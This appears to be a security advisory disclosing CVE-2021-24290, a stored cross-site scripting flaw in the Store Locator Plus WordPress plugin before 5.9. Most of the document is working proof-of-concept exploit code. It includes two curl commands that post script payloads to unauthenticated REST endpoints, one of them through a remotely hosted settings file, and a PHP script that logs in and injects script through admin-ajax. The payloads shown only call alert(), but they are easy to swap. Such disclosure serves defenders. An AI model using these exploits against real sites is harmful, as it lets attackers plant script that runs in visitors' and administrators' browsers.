Store Locator Plus < 5.9 – Unauthenticated Stored XSS | CVE 2021-24290

Description

There are several endpoints in the plugin that could allow unauthenticated attackers the ability to inject malicious JavaScript into pages.

Proof of Concept

PoC #1
curl -i -s -k -X $'POST' --data-binary $'value=<script>alert(0)</script>' $'http://[SITE_URL]/wp-json/store-locator-plus/v2/options/label_radius/[MD5-OF-SITE-URL-HERE]/'

PoC #2
curl -i -s -k -X $'POST' \ --data $'file-meta={\"url\":\"https://URL/slp_settings.json\"}' $'http://[YOURTARGETURL]/wp-json/store-locator-plus/v2/options/import/' 

Where slp_settings.json is:
{"store-locator-le":{"settings":{"options":{"label_radius":"<script>alert(\"howdy\")</script>"}}}}

PoC #3 
*Requires Authentication
<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

//XSS
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'slp_change_option',
    'formdata[option_name]' => 'options_nojs[label_radius]',
    'formdata[option_value]' => '<script>alert(1)</script>'

]);

$content = curl_exec($ch);
echo $content;

?>